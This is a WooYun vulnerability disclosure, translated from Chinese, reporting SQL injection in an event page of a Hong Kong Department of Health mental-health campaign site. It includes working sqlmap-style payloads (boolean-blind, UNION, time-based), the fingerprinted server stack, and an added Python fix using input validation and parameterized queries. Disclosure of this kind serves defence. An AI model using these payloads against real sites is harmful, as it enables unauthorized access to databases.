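Vulnerability Summary
Bug ID: wooyun-2016-0224063
Title: SQL injection on the official 好心情@HK website exposes multiple databases on the same server (Hong Kong region)
Vendor: 好心情@HK
Author: 路人甲
Submitted: 2016-06-29 09:24
Fixed: 2016-07-04 09:35
Disclosed: 2016-07-04 09:35
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 16
Status: Handed over to a third-party partner organization (HKCERT, the Hong Kong Computer Emergency Response Team Coordination Centre) for handling
Source: http://www.wooyun.org; for questions or help, contact [email protected]
Tags: none
Vulnerability Details
Disclosure status:
2016-06-29: Details sent to the vendor; awaiting vendor handling
2016-06-29: The vendor has viewed the report; details are visible to the vendor only
2016-07-04: The vendor has actively ignored the vulnerability; details disclosed to the public
Brief description:
「好心情@HK」 (the Campaign) is a three-year, territory-wide mental health promotion campaign launched by the Department of Health in January 2016.
Campaign objectives:
to increase public engagement in mental well-being promotion, and
to increase public knowledge and understanding of mental health.
Detailed description:
http://**.**.**.**/sc/event_details.asp?id=3 (GET)
Proof of vulnerability: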
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3 AND 8705=8705
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-7236 UNION ALL SELECT CHAR(113)+CHAR(105)+CHAR(109)+CHAR(122)+CHAR(113)+CHAR(117)+CHAR(90)+CHAR(79)+CHAR(115)+CHAR(80)+CHAR(81)+CHAR(66)+CHAR(113)+CHAR(77)+CHAR(100)+CHAR(113)+CHAR(110)+CHAR(112)+CHAR(107)+CHAR(113),NULL,NULL--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: id=-9410 OR 3743=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft SQL Server 2008
available databases [69]:
Fix:
Filter the parameter.
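One way to apply the parameter filtering named in the fix, as an added example that is not part of the original report or the vendor's code: the `id` value is accepted only as a plain decimal integer and is then bound as a query parameter. Python and sqlite3 stand in for the site's ASP and SQL Server stack; the `events` table, its columns and all function names are assumptions.

```python
import re
import sqlite3

# Assumption: event ids are small positive integers, as in the reported URL (id=3).
# [0-9] is used instead of \d so that non-ASCII digits are rejected as well.
_ID_RE = re.compile(r"[0-9]{1,9}")


def parse_event_id(raw):
    """Return the id as an int, or None if raw is not a plain decimal integer."""
    if not isinstance(raw, str) or not _ID_RE.fullmatch(raw):
        return None
    return int(raw)


def make_demo_db():
    """Constructed sample data; sqlite3 stands in for the SQL Server back end."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE events (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.executemany(
        "INSERT INTO events VALUES (?, ?, ?)",
        [(3, "Sample event", "constructed row"), (4, "Other event", "constructed row")],
    )
    return db


def get_event(db, raw_id):
    """Validate first, then bind the value; the SQL text never contains user input."""
    event_id = parse_event_id(raw_id)
    if event_id is None:
        return None  # caller should answer 400/404 without touching the database
    query = "SELECT id, title, body FROM events WHERE id = ?"
    return db.execute(query, (event_id,)).fetchone()


if __name__ == "__main__":
    demo = make_demo_db()
    for value in ["3", "3 AND 8705=8705", "-7236", "5"]:
        print(repr(value), "->", get_event(demo, value))
```

Validation alone would already reject the three payloads in the proof above; binding the parameter keeps the query safe even if the validation rule is later loosened.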
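Copyright notice: when reposting, credit the source 路人甲@乌云 (WooYun)
Vulnerability Response
Vendor response:
Severity: No impact; ignored by vendor
Ignored on: 2016-07-04 09:35
Vendor reply:
Vulnerability Rank: 4 (WooYun rating)
Latest status:
None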